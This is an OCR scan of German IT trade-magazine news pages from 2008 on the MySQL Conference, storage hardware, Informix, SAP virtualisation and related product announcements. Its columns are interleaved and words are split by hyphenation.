Projekts EPA.nrw den Weg ei- 
ner elektronischen Patientenak- 
te vom IT-System des Arztes 
über das Krankenhaus bis zum 
Patienten. Die Deutsche Ren- 
tenversicherung präsentierte ei- 
nen Implementierungsleitfaden 
für den eReha-Entlassungsbe- 
richt zum Austausch ärztlicher 
Berichte. Als Europa-Premiere 
stellte Microsoft ein Kranken- 
haus-Informationssystem na- 
mens Amalga vor, das die freie 
Kombination aller bislang iso- 
lierten IT-Lösungen in den Be- 
reichen Klinik, Finanzen und 
Verwaltung ermöglichen soll. 
Zwischenzeitlich zeigt sich 
noch eine ganz andere Entwick- 
lung, die die Planer der eGK 
1994 noch gar nicht absehen 
konnten: Warum nicht die Ge- 
sundheitsdaten online stellen? 
In den USA kündigen sich hier 
neue kommerzielle Angebote 
an, zum Beispiel von Google 
und Microsoft. Auch der „Ho- 
mo Handykus“ könnte mithilfe 
der Near Field Communication 
von Handys mobile Vorlieben 
entwickeln. (ur) 
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Datenbanken 


MySQl Conference & Expo 2008 


Mehr fürs Geld 


Markus Franz 


Im Vordergrund der diesjährigen MySQL Conference 
standen die Übernahme der freien Datenbank durch 
Sun und die weitere Entwicklung des Produkts. 


m kalifornischen Santa Cla- 

ra fand Mitte April die 
Hauskonferenz des RDBMS- 
Anbieters MySQL statt, auf 
der sich 2000 Besucher und 
über 50 Aussteller drängelten. 
Die wichtigste Frage in die- 
sem Jahr: Wie geht es mit 
MySQL nach der Übernahme 
durch Sun Microsystems wei- 
ter? Marten Mickos, Ex-CEO 
und nun Senior Vice President 
der Database Group bei Sun, 
gab darauf im MySQL Partner 
Meeting eine Antwort: Die 
Übernahme wird keine großen, 
ungeplanten Änderungen an 
Produkten oder der Zusammen- 
arbeit mit der Community brin- 
gen. MySQL werde in Zu- 
kunft aber verstärkt einzelne 
Features ausschließlich in der 
kommerziellen Version ent- 
halten — zum Beispiel Teile 
der für MySQL 6.0 geplanten 
Backup-Funktion. 


Schwartz 
lobt Open Source 


Als weitere wichtige Ankün- 
digung wurde MySQL 5.1 
präsentiert, das kurz vor der 
Veröffentlichung steht. Der ak- 
tuelle Release Candidate und 
die endgültige Version sollen 
erheblich stabiler und schneller 
sein als Version 5.0, mit der 
laut Mickos das MySQL-Team 
selbst nicht zufrieden war. 
Während der Konferenz er- 
schien MySQL Workbench als 
neues Produkt, von dem es ei- 
ne Community- und eine En- 
terprise-Variante gibt. Hierbei 
handelt es sich um einen De- 
signer, mit dem man grafisch 
die MySQL-Datenbank entwi- 
ckeln, verwalten und komple- 
xe Tabellen modellieren kann. 

In seiner Keynote sang Suns 
CEO Jonathan Schwartz ein 
Loblied auf die Open-Source- 
Szene: Er sei seit seinem Antritt 
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bei Sun vor zwei Jahren ein 
starker Kämpfer für offene 
Standards. Mit MySQL habe 
eine großartige Zusammenar- 
beit begonnen, die für die bei- 
den Unternehmen und ihre 
Kunden exzellente neue Mög- 
lichkeiten biete. Einerseits pro- 
fitierten die Open-Source-An- 
hänger durch Suns Investitionen 
und jahrelange Erfahrung; an- 
dererseits gebe es mit MySQL 
für Unternehmen nun einen in- 
tegrierten Open-Source-Stack. 

Weitere Veröffentlichungen 
während der Konferenz kamen 
von Zmanda, die eine neue 
Version der Backup-Lösung 
für MySQL ankündigten, und 
von Kickfire. Dieser Sponsor 
der Konferenz verkündete die 
Partnerschaft mit MySQL und 
weiteren Datenbankanbietern. 
Er kündigte eine integrierte 
Business-Intelligence-Lösung 
an, die als Appliance mit 
MySQL ausgeliefert werde. 

Im Vortragsprogramm er- 
klärte Sebastian Bergmann 
das Testen von Datenbankan- 
wendungen mit PHPUnit und 
DBUnit. Joshua Drake zeigte, 
was MySQL von PostgreSQL 
lernen kann. Robin Schumacher 
und Rob Young stellten in „The 
Future of MySQL“ die Ent- 
wicklung der Datenbank in den 
nächsten fünf Jahren vor: einer- 
seits hin zur universellen Basis 
für Open-Source-Projekte, an- 
dererseits in den High-End-Be- 
reich für skalierbare Unterneh- 
mensanwendungen. Dabei gab 
er einen Ausblick auf den kom- 
menden Load Balancer und den 
Query Analyzer. 

Innobase, das nun zu Ora- 
cle gehört, stellte die neue 
Version seiner Storage Engine 
für MySQL vor. Damit können 
Anwender über den Plugga- 
ble-Storage-Mechanismus von 
MySQL 5.1 das transaktions- 
fähige InnoDB-Backend ein- 
setzen. (ck) 
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MARKT + TRENDS 


Diverses 


IX- 


Veranstaltungen 


‚xkonferenz.de. 


Auch in diesem Jahr konnten 
wir unsere langjährigen Auto- 
ren Christoph Leisegang und 
Stefan Mintert für ein Seminar 
zum Thema Web 2.0 mit Ajax 
gewinnen. Im Juli und August 
finden in Stuttgart, München 
und Frankfurt/M. zweitägige 
Workshops statt. Die Teilneh- 
mer beherrschen danach die 
technischen Grundlagen zur 
selbstständigen Entwicklung 
von Webanwendungen mit 
Ajax. Aufpassen: Bis zum 15. 
Juni greift noch der Frühbuch- 
errabatt von 20 Prozent. 


Mit denselben Referenten 
findet am 22./23. Juli in 
München ein Seminar zum 
Thema XML-Verarbeitung 
mit XSLT statt (www.ix- 
konferenz.de). 


Ausgeweitet haben wir auch die 
Zusammenarbeit mit Holger 
Schwichtenberg, und zwar in 
Sachen Seminare zur .Net-Soft- 
wareentwicklung, die mittler- 
weile die ganze Spannbreite 
der Programmierung mit Mi- 
crosofts Framework abdecken. 


Wirklich beeilen muss sich, 
wer noch in den Genuss des 
Frühbucherrabatts für die Fo- 
rensik-Workshops kommen 
will — der gilt nämlich nur 
noch bis zum 15. Mai. Ähnlich 
schnell sollten alle sein, die 
gerne einen Vortrag auf der 
MedConf 2008 zum Thema 
Software- und Systementwurf 
für Medical Devices halten 
möchten. Die Einreichungsfrist 
endet am 16. Mai. 


Neues Event-Format 


Außerdem bietet iX ab sofort 
ein neues Veranstaltungsformat 
an: die iX-Roadshows. Sie er- 
gänzen die iX-Konferenzen 
und -Workshops und verstehen 
sich als Präsentationsmöglich- 
keit für unsere Medienpartner. 
Die ersten Roadshows sind den 
Themen Anforderungsmanage- 
ment, Testen, Projektmanage- 
ment und UML-Modellierung 
gewidmet. Die Teilnahme ist 
kostenlos; die Roadshows wer- 
den in mehreren Städten in 
Deutschland stattfinden. 
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Prozessautomatisierung für das RZ 


CA erweitert mithilfe von Opa- 
lis sein Angebot für die Re- 
chenzentrumsautomatisierung. 
Die Software von Opalis hat 
man bereits in einige Produkte 
wie Spectrum und E-Health in- 
tegriert. Durch das jüngste Ver- 
triebsabkommen erweitert das 
Unternehmen nun die Suite von 
IT-Prozessautomationslösun- 
gen. Die Software des Ver- 
triebspartners eignet sich insbe- 


sondere für die Automation der 
Prozesse und Workflows kri- 
tischer IT-Aufgaben wie Vir- 
tualisierung, Provisionierung, 
ITIL-konforme Prozesse (ITIL, 
IT Infrastructure Library), Di- 
saster Recovery, Konsolidie- 
rung und Security. Neben CA 
arbeitet das kanadische Unter- 
nehmen auch mit EMC, Micro- 
soft, IBM, VMware, Bladelo- 
gic, BMC und HP zusammen. 


Vollständiges Inventarmanagement 


Mit Version 7.2.4 aktualisiert 
Touchpaper seine IT Business 
Management Suite (ITBM). Ein 
Asset-Management-Prozesspa- 
ket soll den gesamten Prozess 
rund um die IT-Inventarisierung 
verwalten — vom Beschaffen bis 
zum Entsorgen. Anschaffungen 
lässt sich die IT-Abteilung vom 
Budgetverantwortlichen geneh- 
migen. Das Touchpaper-Sys- 
tem generiert den Auftrag zum 
Einkauf und leitet ihn an die Fi- 
nanzabteilung weiter. Die Soft- 
ware überwacht anschließend 


die Lieferung und, falls erfor- 
derlich, die Installation und 
Konfiguration der neuen Gerä- 
te. Neues IT-Inventar erscheint 
als Configuration Item (CI) in 
der Configuration Management 
Database (CMDB). Im Falle der 
Ausmusterung liefert das Pro- 
zesspaket den Nachweis, dass 
der Entsorgungsprozess ent- 
sprechend den EU-Richtlinien 
erfolgt, etwa gemäß WEEE 
(Waste Electrical and Electronic 
Equipment). Als Vorbild für 
das ITBM diente ITIL v3. 


Agentenfreies Server-Monitoring 


Mit Experttracer for Server 
mischt das Darmstädter Soft- 
warehaus Servicetrace im 
Tool-Markt zur Überwachung 
der Server-Ressourcen mit. 
Die Software analysiert agen- 
tenlos Windows-, Unix- und 
Linux-Systeme in Bezug auf 
CPU- und Speicher-Auslas- 
tung, Verfügbarkeit, Netz- 
werkkartenbelastung und Zahl 
der angemeldeten Benutzer. 
Das Server-Monitoring zur 
Darstellung entscheidungsrele- 
vanter Informationen erfolgt 
zentral per SNMP. Mittels ei- 


ner Scan-Funktion lassen sich 
laut Herstellerangaben zusätz- 
liche Server-Systeme minuten- 
schnell in die Überwachung 
einbinden. Die Darmstädter 
Firma bietet neben der Server- 
Monitoring-Lösung im Rah- 
men des Servicetracer-An- 
gebots auch Module zur 
Netzwerküberwachung, einen 
End-to-End-Roboter für das 
Applikations-Monitoring auf 
der Client-Ebene und eine zen- 
trale Managementeinheit an. 
Die Plattform umfasst eine 
SAP-Komponente. 


iX-Umfrage: 50:50 für VoIP 


Auf Voice over IP gut verzich- 
ten zu können meint rund die 
Hälfte (49 %) der Teilnehmer 
unserer Online-Umfrage, die 
parallel zu Ausgabe 5/08 auf 
www.ix.de lief. Dafür ist 
Internet-Telefonie für die ex- 
terne oder interne Kommuni- 
kation bereits bei 38 % der Ant- 
wortenden im Einsatz, 13 % 
haben VoIP auf der To-do-Liste 
- insgesamt also ein klares Patt. 
Details sind der nebenstehen- 
den Grafik zu entnehmen. Am 
14. Mai startet die neue iX- 


Ist in Ihrer Firma Voice over IP als Ersatz für die 
klassische Telefonie geplant oder im Einsatz? 


Nein, derzeit kein Bedarf. 50% ee 


Bereits im Einsatz, aber nur 6 
intern (inkl. Filialanbindung). 16% ED] 


Bereits intern und extern 
im Einsatz. 


21% E# 


Geplant, aber nur intern 6 
(inkl. Filialanbindung). 5% I 


Geplant für internen und 5 
externen Einsatz. :% | 


Gesamtstimmen: 530 (gerundet) 
Umfrage, es geht um eigene 


Erfahrungen mit Viren und an- 
derer Malware. 


Beworben: Das Potsdamer 
Hasso-Plattner-Institut 
(HPI) ließ an allen Gymna- 
sien der alten Bundesländer 
zusammen mit der Jugend- 
zeitschrift „SPIESSER“ 
Postkarten auslegen, die auf 
den HPI-Studiengang „IT 
Systems Engineering“ hin- 
weisen. Abiturienten des 
aktuellen Jahrgangs können 
sich bis zum 15. Juli um ei- 
nen der 80 Studienplätze 
bewerben (www.hpi.uni- 
potsdam.de/bachelor). 


SVG-Viewer: Examotion 
hat die Version 1.0 seines 
SVG-Viewers Renesis 
gegenüber dem Vorgänger 
0.7 völlig neu geschrieben. 
Er unterstützt CSS 2.1, 
DOM 3 Core und Events 
sowie SVG 1.1. Erhältlich 
ist das frei verfügbare Tool 
bei www.examotion.com 
sowohl als Stand-alone- 
Version für XP und Vista 
wie als Internet-Explorer- 
Plug-in. 


Altes Internet: Anders als 
zahlreiche Medien berichte- 
ten, ist das Internet nicht 
erst 15 Jahre alt. Das viel- 
fach gemeldete Jubiläum 
des WWW als Teil des 
Internet leitet sich davon 
ab, dass Tim Berners-Lee 
und Robert Cailliau von ih- 
ren Chefs am Genfer Kern- 
forschungszentrum CERN 
am 30. April 1993 die Er- 
laubnis erhielten, ihre Web- 
bibliothek libwww als freie 
Software weiterzugeben. 


Wikipedia-Buch: Im Sep- 
tember will das Bertels- 
mann Lexikon Institut, das 
zum Wissen Media Verlag 
gehört, für 19,95 € ein ein- 
bändiges Wikipedia-Lexi- 
kon herausgeben. 50000 in 
den vergangenen anderthalb 
Jahren häufig nachgefragte 
Begriffe soll es enthalten. 


Kartenformat: Google hat 
im April die XML-Anwen- 
dung KML an das Open 
Geospatial Consortium 
(OGC) übergeben, wo die 
Geodatensprache jetzt als 
offener Standard betrieben 
wird (www.opengeospati 
al.org/standards/kml). 
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Hardware 


SGI baut seinen RAID-Speicher aus 


InfiniteStorage 4600 heißt 
SGlIs neue Generation von 
RAID-Speichern, die speziell 
für datenintensive Anwendun- 
gen mit hohen V/O-Anforde- 
rungen und die Konsolidierung 
komplexer Datenbestände aus- 
gelegt sind. Sie bietet 16 re- 
dundante Anschlüsse mit einer 
Übertragungsgeschwindigkeit 
von 4 GBit/s für Fibre-Chan- 
nel-Laufwerke. Damit ist sie 
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Plattenweise: Bis zu 256 
Terabyte Massenspeicher kann 
das InfiniteStorage 4600 von 
SGI aufnehmen (Abb. 1). 


doppelt so schnell wie der 
Vorgänger, die InfiniteStorage 
4500. Die 4600 kommt auf bis 
zu 6000 MByte/s, wenn der 
Host sequenziell 512 KByte 
große Datenpakete liest — was 
in der Praxis selten vorkommt. 
SGI gibt bei 4 KByte großen 
Anfragen an ein Fibre-Chan- 
nel-Laufwerk eine Kontinuier- 
liche Leistung von 175 000 
Input/Output-Operationen je 
Sekunde an. 

Das RAID-System hat in 
seiner Basisversion Kapazität 
für 256 Fibre-Channel- oder 
SATA-Laufwerke. Insgesamt 
sind Speichervolumina bis zu 
256 Terabyte denkbar. Die 
InfiniteStorage 4600 beherrscht 
die RAID-Level 1, 3, 5, 6 und 
10 und bietet redundante V/O- 
Pfade nebst automatisierten 
Failover-Prozessen. Erste Infi- 
niteStorage 4600 Arrays sollen 
beim Norddeutschen Verbund 
für Hoch- und Höchstleistungs- 
rechnen (HLRN) in Betrieb ge- 
hen. Der HLRN betreibt seine 
Supercomputer an zwei Stand- 
orten: dem Konrad-Zuse-Zen- 
trum für Informationstechnik in 
Berlin (ZIB) und dem Regiona- 
len Rechenzentrum für Nieder- 
sachsen in Hannover (RRZN), 
wo das RAID-System zum 
Einsatz kommen soll. Die An- 
schaffung eines InfiniteStorage 
4600 schlägt mindestens mit 
105 000 Euro zu Buche (www. 
sgi.com/products/storage/). 

Nikolai Zotow 


Eix-tink ix0806028 


Neues Rack-Format für Rechenzentren 


Mit einem neuen Rack-Format 
will IBM die Kosten für Strom- 
versorgung und Kühlung im 
RZ reduzieren. Das Angebot 
richtet sich vornehmlich an 
Betreiber von Web-2.0-Diens- 
ten oder großen Clustern. 

Die iDataPlex getauften 
Racks sind nur etwa 70 cm tief 
(27,6 Zoll) — normale 19-Zoll- 
Racks bringen es fast auf 
120 m - und sind deshalb 
leichter zu kühlen. Laut IBM 
passen doppelt so viele Syste- 
me als sonst ins Rack, bei 5-fa- 
cher Rechenleistung sinkt die 
Energieaufnahme um 40 %. 
Mit einer flüssigkeitsgekühlten 
Rücktür (Rear Heat Exchan- 
ger) soll man sogar mit Zim- 
mertemperatur auskommen. 

Bislang bietet IBM das 
iDataPlex-System für Intel- 
Server an. Ein 2 U hohes 
Rechnermodul enthält zwei 
Dual-Xeon-Systeme mit ge- 
meinsamer Stromversorgung 
und Lüftung. Zusätzliche Spei- 
cherknoten bringen auf 3 U ma- 
ximal zwölf 3,5-Zoll-Festplat- 
ten mit je 750 GByte unter. 


Schlankheitskur: Die nur 70 cm 
tiefen Schränke lassen sich 
effektiver kühlen als die sonst 
120 cm tiefen 19-Zoll-Racks 
(Abb. 2). 


In Deutschland soll iData- 
Plex zum Jahresende verfügbar 
sein. Die Preise lägen zwi- 
schen 150 000 und 300 000 
US-$, damit 20 bis 25 % unter 
einer vergleichbaren Lösung 
mit 1-U-Servern, betont der 
Hersteller. Nikolai Zotow 


eo .. eo 
Standard-Schnittstelle für Flas "Speic er 


Die vor einem Jahr von Dell, 
Intel und Microsoft ins Leben 
gerufene Non-Volatile Memo- 
ry Host Controller Interface 
(NVMHCI Working Group 
hat die Version 1.0 der NVM- 
HCI-Spezifikation vorgelegt. 
Sie definiert eine einheitliche 
Programmierschnittstelle für 
Flash-Speicher. Geht es nach 


Festplatten-Neuheiten bei Hitachi, Western Digital und Fujitsu 


Eine Server-Festplatte mit 
450 GByte Kapazität bringt 
Hitachi auf den Markt. Die 
Ultrastar 15K450 (siehe iX- 
Link) lässt ihre vier Scheiben 
mit 15 000 U/min rotieren und 
erreicht dadurch einen Daten- 
durchsatz von 100 bis 160 
MByte/s (innen/außen) bei ei- 
ner durchschnittlichen Latenz 
von nur 2 ms. Allerdings be- 
zahlt der Nutzer die hohe Leis- 
tung mit entsprechendem Ener- 
giebedarf: Die SAS-Version 
des Laufwerks schluckt im 
Betrieb 17,2 und im Leerlauf 
13,3 Watt, die 4-GBit-Fibre- 
Channel-Variante sogar noch 
etwas mehr. Der Hersteller will 
die Laufwerke noch im zwei- 
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ten Quartal ausliefern; Preise 
nannte er bislang noch nicht 
(www .hitachigst.com). 


Kühlkörper integriert 


Western Digital verpackt in 
der „VelociRaptor“ eine 2,5" 
große SATA-Platte mit 10 000 
U/min und 300 GByte in ein 
Gehäuse mit 3,5-Zoll-Form- 
faktor — den Rest des Raums 
nimmt ein „Icepack“ getaufter 
Montagerahmen mit Kühlkör- 
per ein. Das laut WD „schnells- 
te SATA-Laufwerk der Welt“ 
überträgt bis zu 120 MByte/s. 
Angesichts dessen ist sein 
Stromverbrauch durchaus mo- 
derat: 6,1 Watt im Betrieb, 4,5 


im Leerlauf und 0,4 im 
Schlafmodus. Die Zuverläs- 
sigkeit beziffert der Hersteller 
mit einer MTBF von 1,2 Mil- 
lionen Stunden (www.wdc. 
com/de/). 

Seine Notebook-Festplatten- 
serie MHZ2 CJ stattet Fujitsu 
mit einem Verschlüsselungs- 
Chip aus. Alle Daten auf der 
320 GByte großen SATA-Plat- 
te lassen sich mit dem AES-Al- 
gorithmus (Advanced Encryp- 
tion Standard) verschlüsseln. 
Anders als bei Software-Ver- 
schlüsselung — etwa mit True- 
Crypt - bleibt der verwendete 
256-Bit-Schlüssel jedoch sicher 
im Laufwerk. Zusätzlich be- 
herrschen die Geräte soge- 


dem Willen der Initiatoren, soll 
NVMHCI in jeden PC Einzug 
halten, ähnlich wie zuvor das 
Enhanced HCI für USB 20 
oder das Advanced HCI für 
SATA-Festplatten. Entwickler 
müssen allerdings von Intel ei- 
ne Lizenz erwerben. 


Eix-ink ix0806028 


nanntes schnelles Secure Erase: 
Alle Daten auf der Platte las- 
sen sich innerhalb einer Se- 
kunde löschen. Trotz der zu- 
sätzlichen Hardware und einer 
Rotationsgeschwindigkeit von 
7200 U/min genehmigt sich 
die Platte beim Lesen und 
Schreiben nur 2,3 Watt. Zum 
Datendurchsatz macht Fujitsu 
bisher leider keine Angaben. 
Bis zum Jahresende will der 
Hersteller 2 Millionen Stück 
verkaufen; Lieferbeginn ist im 
Mai. Preise blieben ungenannt 
(www £ujitsu.com/us/services/ 
computing/storage/hdd/mobile 
/mhz2320cj-sata.html). 


Eix-ink ix0806028 
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Datenbanken 


IBM verbessert Cluster-Fähigkeiten in Informix Dynamic Server 11.5 


Ende April erschien Version 
11.5 (Cheetah 2) des Informix 
Dynamic Server (IDS). Ein 
Schwerpunkt der Entwicklung 
seit Cheetah 1 war die vollstän- 
dige Unterstützung von DML- 
Operationen (Data Manipula- 
tion Language) auf allen Knoten 
eines Clusters. Früher war das 
Schreiben (INSERT, DELETE, 
UPDATE) nur auf dem Master- 
Server erlaubt, auf alle anderen 
Cluster-Maschinen konnten An- 
wendungen ausschließlich le- 
send zugreifen. Hinter den Ku- 
lissen ist das weiterhin so, denn 


die Secondary Server leiten ab 
IDS 11.5 alle Schreibbefehle an 
den Chef des Clusters weiter, 
der sie ausführt und im Verbund 
weiterreicht. Entwickler müssen 
so nicht mehr zwischen Prima- 
ry und Secondary Servern un- 
terscheiden. Damit will IBM 
den Abstand zu Oracle und des- 
sen Rapid Application Cluster 
verringern. Der Connection 
Manager oncmsm verteilt alle 
Client-Anfragen im Cluster auf 
die jeweils am wenigsten belas- 
teten Rechner, während der 
ebenfalls neue „Connection 


Manager Arbitrator“ bei Aus- 
fall des Primärknotens im Clus- 
ter automatisch einen Rechner 
auswählt, der die Aufgaben der 
defekten Maschine übernimmt. 

Weitere Verbesserungen be- 
treffen das Open-Admin-Tool. 
Diese im Browser laufende 
Anwendung erlaubt das Über- 
wachen und Verwalten von 
Cluster-Rechnern (Hinzufügen, 
Entfernen). In Stored Proce- 
dures lassen sich dynamische 
Statements definieren und ver- 
wenden, BIGINT und BIGSE- 
RIAL kommen als neue Daten- 


MySQ@L-Funktionen weiterhin in allen Produktvarianten vorhanden 


Kurz nachdem Marten Mickos 
auf der MySQL-Conference (8. 
Bericht auf S. 23) angekündigt 
hatte, in Zukunft seien manche 
Neuerungen der freien Daten- 
bank nur noch in der kommer- 
ziellen Version verfügbar, kor- 
rigierte Suns Chef Jonathan 
Schwartz: Weiterhin würden al- 
le MySQL-Funktionen in der 


freien („Community Edition“) 
und in der kommerziellen Vari- 
ante zur Verfügung stehen. 
Inzwischen gibt es einige In- 
formationen, was die Entwick- 
ler für Kommende MySQL-Ver- 
sionen planen (s. iX-Link). 6.0 
soll Ende des Jahres fertig wer- 
den und die neu geschriebene 
transaktionsfähige Falcon-En- 


gine sowie eine Backup-Funk- 
tion mitbringen, die für alle 
Backends funktioniert. Verbes- 
serungen im Optimierer sollen 
Subqueries beschleunigen. 

Für folgende 6er-Versionen 
ab 2009 planen die Entwickler 
Fremdschlüssel-Support für 
sämtliche Speicher-Engines, 
SIGNAL in Stored Procedures 


typen hinzu. Mit IDS 11.5 bie- 
tet IBM erstmals eine Infor- 
mix-Version für Mac OS X an. 
Die Firma sieht mögliche Ein- 
satzbereiche vor allem bei (On- 
line-)Spielen und in der Grafik- 
sowie Prepress-Branche. Für 
Mac OS X 10.5 (Leopard) stellt 
sie wie für Linux und Windows 
eine „Developer Edition“ des 
IDS zum Herunterladen zur 
Verfügung (s. iX-Links). Sie ist 
nicht funktional eingeschränkt, 
darf jedoch nur für Entwick- 
lungsarbeiten, nicht in der Pro- 
duktion genutzt werden. 


und schnellere Cursor. Erst ab 
MySQL 7.x wird es die von an- 
deren Produkten bekannten 
ROLEs geben, die die Benut- 
zerverwaltung erleichtern. Eben- 
falls für diese Versionen ist 
Datenverschlüsselung für Ta- 
bellen und Spalten geplant. 


Eix-ink ix0806029 
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MARKT + TRENDS 


Standardsoftware 


SAP engagiert sich für Virtualisierung 


Mitte April verkündete SAP die 
Gründung einer Community 
zur IT-Virtualisierung. Deren 
Ziel: Das Entwickeln von Vir- 
tualisierungstechniken, die sich 
an den Geschäftsprozessen 
orientierten. Dabei will man al- 
le Ebenen der Virtualisierung 
abdecken — vom Netzwerk über 
CPU, Server, Speichersystem 
bis hin zum Desktop. Zu den 
Gründungsmitgliedern zählen 


Funkfunktion: Output-Ma- 
nagementspezialist Stream- 
serve hat seine Software mit 
einem RFID-Modul ausge- 
stattet. Es erlaubt Unterneh- 
men, RFID-Tags zu kodieren 
und über spezielle Drucker 
auszugeben. Die Komponen- 
te unterstützt verschiedene 
Tag-Typen, Kommunika- 
tionsprotokolle, elektronische 
Produktcodes und Drucker. 


Größere Auswahl: Mit der 
webbasierenden Projektma- 
nagementsoftware Projektron 
des gleichnamigen Herstel- 
lers lassen sich jetzt auch 
Angebote erstellen. Den ein- 
zelnen Positionen kann der 
Benutzer Rabatte und Zu- 
satzinformationen sowie er- 
läuternde Textblöcke zuwei- 
sen (etwa zu Klauseln). Eine 
Liste über alle laufenden An- 
gebote gibt Auskunft über zu 
erwartende Einnahmen und 
Bindungsfristen. 


Prüfsiegel: SAP hat die Ar- 
chivschnittstelle des ECM- 
Anbieters d.velop für den 
Netweaver 7.0 zertifiziert. 
Über d.link for archivelink 
2.4 lassen sich große Daten- 
mengen im ECM-System d.3 
revisionssicher ablegen. Die 
Zertifizierung bezieht sich 
auf die Funktionen HTTP 
Content Server, OLE Front- 
end, Barcode BAPI und So- 
lution Manager Ready. 


Für Entwickler: EMC offe- 
riert neue OEM-Software für 
Content-Management, Doku- 
mentenerfassung und XML- 
Datenmanagement. Jüngstes 
Mitglied der Documentum 
Content Server OEM Edition 
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AMD, Cisco, Citrix, EMC, HP, 
Intel, Network Appliance, No- 
vell, Red Hat, Sun und VM- 
ware. Schon heute stehen den 
SAP-Anwendern unterschiedli- 
che Virtualisierungsansätze zur 
Verfügung. Beispielsweise kön- 
nen sie Applikationen auf Basis 
von VMwares ESX-Server in 
Produktivumgebungen mit 64- 
Bit-Windows und Linux nut- 
zen. Gemeinsam mit ihrem be- 


ist der XML-Store-Baustein. 
Er verwaltet XML-Daten wie 
technische Informationen und 
ermöglicht ihre gemeinsame 
Nutzung. Mit dem neuen In- 
formation Rights Manage- 
ment Software Development 
Kit lassen sich Sicherheits- 
funktionen in Web-2.0-An- 
wendungen, SaaS-Umgebun- 
gen (Software as a Service) 
oder Arbeitsgeräte einbinden. 


Lukratives CRM: Einer 
Gartner-Untersuchung zu- 
folge soll der Umsatz mit 
CRM-Software im laufenden 
Jahr weltweit um 14,2 % auf 
ein Volumen von 8,9 Mrd. 
Dollar zulegen. Die Einnah- 
men in Nordamerika — mit 
4,3 Mrd. Dollar der lukra- 
tivste Markt für die einschlä- 
gigen Anbieter — sollen bis 
2012 auf 7,6 Mrd. Dollar 
steigen. Für Europa (2007: 
2,6 Mrd. Dollar) prognosti- 
zieren die Analysten 2008 
ein Marktvolumen von 3,9 
Mrd. Dollar. 


Wiki im Anflug: SAP möch- 
te seine Portaltechnik mit ei- 
nem Wiki veredeln. Als Ba- 
sis dient Clearspace von Jive 
Software. Das Programm 
läuft auf dem hauseigenen 
J2EE-Server und wird als 
iView in der Portaloberfläche 
integriert. Ab Herbst soll ei- 
ne Beta-Version verfügbar 
sein. Auf die Marktreife 
müssen die Anwender wohl 
noch rund ein Jahr warten. 


Mobiles Geschäft: SAP und 
Research In Motion planen 
neuartige mobile Geschäfts- 
lösungen. Im Rahmen ihrer 
Zusammenarbeit wollen beide 
Unternehmen den mobilen 
Zugriff auf SAP-Geschäftsan- 
wendungen über die Black- 
berry-Plattform ermöglichen. 


vorzugten Linux-Lieferanten 
Novell arbeiten die Walldorfer 
daran, dessen Virtualisierungs- 
techniken für SAP-Programme 
unter Suse Linux Enterprise an- 
bieten zu können. Aus dem ei- 
genen Hause stammt der auf 
Netweavers J2EE-Engine ba- 
sierende ACC (Adaptive Com- 
puting Controller). Mit der Ma- 
nagementkomponente lassen 
sich die Laufzeitdaten logischer 


und physischer Landschaften 
überwachen, Anwendungsmo- 
dule starten, stoppen und verla- 
gern sowie Hardwareressourcen 
bestimmten Komponenten zu- 
ordnen. Nach offizieller Lesart 
ergänzt der ACC andere auf 
Hypervisor-Technik aufbauen- 
de Virtualisierungslösungen a la 
VMware, beispielsweise im 
Rahmen von Wartungsarbeiten 
am Betriebssystem. 


Salesforce integriert Google Apps 


Salesforce.com vermarktet Goo- 
gles Office-Suite Apps als Teil 
der Anwendungsoberfläche sei- 
ner eigenen Mietsoftware. Da- 
durch sind die Nutzer bei- 
spielsweise in der Lage, eine 
E-Mail im Google-Postfach 
via Knopfdruck einem Daten- 
satz im Salesforce-System zu- 


zuweisen. Mit den Office- 
Werkzeugen lassen sich Ange- 
bote, Berichte und Ähnliches 
verfassen. Bislang stand den 
Salesforce-Anwendern lediglich 
ein Modul zur Verfügung, mit 
dem sich eine lokal installierte 
Office-Suite mit der On-De- 
mand-Applikation koppeln ließ. 


Mach mit neuen Fähigkeiten 


Flexiblere Planungsprozesse so- 
wie besser angebundene Fach- 
verfahren über eine service- 
orientierte Architektur (SOA) 
soll die neue Version von Mach 
Software bieten. Beispielsweise 
lassen sich mit dem für den 
Einsatz in öffentliche Verwal- 
tungen und Non-Profit-Organi- 


sationen konzipierten Pro- 
gramm Finanzpläne in ver- 
schiedenen Versionen erstellen 
oder aufeinander aufbauen. An 
den aktuellen Wirtschaftsplan 
ist Jeweils eine mittelfristige Fi- 
nanzplanung gekoppelt. Zudem 
bekam Mach neue Dokumen- 
tenmanagementfunktionen. 


Open Text überwacht den Dokumentenfluss 


Auf der europäischen Kun- 
denkonferenz Livelinkup Eu- 
rope 2008 stellte das kanadi- 
sche Softwarehaus Open Text 
seine Technik für das Trans- 
actional Content Processing 
(TCP) vor. Der sperrige Be- 
griff umschreibt dokumenten- 
basierte Abläufe, wie sie beim 
Verarbeiten von Reklamatio- 
nen, Anträgen oder Rechnun- 
gen entstehen. Die TCP-Soft- 
ware stellt die notwendigen 


Funktionen für Überwachung 
und Management hochvolumi- 
ger, weitgehend automatisierter 
und strukturierter Geschäfts- 
prozesse zur Verfügung. Alle 
Inhalte verwaltet der Anwen- 
der mithilfe der Enterprise Li- 
brary Services (zentrales Re- 
pository) über den gesamten 
Lebenszyklus. Zudem bindet 
das Produkt über Middleware 
Drittsysteme wie SAP in die 
Verarbeitung ein. 


Docuware: Buntes Archiv 


Seine Dokumentenmanage- 
mentsoftware hat Docuware mit 
einem farbenfreudigen Tiffma- 
ker-Modul ausgestattet. Formu- 
lare lassen sich in der aktuellen 
Release 5.1 beim Druck gleich- 
zeitig in Farbe archivieren. 
Weiterhin kann der Benutzer 
die Dokumente automatisch mit 
Rück- und zusätzlichen Seiten 


versehen. Für die Ablage selbst 
erstellter Belege übernimmt Do- 
cuware den Druckdatenstrom 
von Windows und teilt ihn in 
Einzeldokumente. Das System 
liest die Kategorisierungs- und 
Indizierungsinformationen aus 
und stellt sie in das Archiv. Op- 
tional hinterlegt das DMS auch 
Formulare oder Briefbögen. 
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MARKT + TRENDS 


World Wide Web 


Webworker arbeiten lange oder in Teilzeit 


2800 zwischen 1970 und 1987 
geborene Teilnehmer beteilig- 
ten sich an einer nicht reprä- 
sentativen Umfrage zu Ar- 
beitsbedingungen, Gehältern 
und dem beruflichem Werde- 
gang von „Webworkern“, die 
die Entwicklergruppe Web- 
kraut (www .webkrauts.de) im 
Januar/Februar dieses Jahres 
durchgeführt hatte. Wie neben- 
stehender Zeichnung zu ent- 
nehmen ist, arbeiten die im und 


fürs Web Tätigen überwiegend 
zwischen 36 und 50 Stunden 
pro Woche. Als Kernkompe- 
tenz bezeichnen gut 72% Mark- 
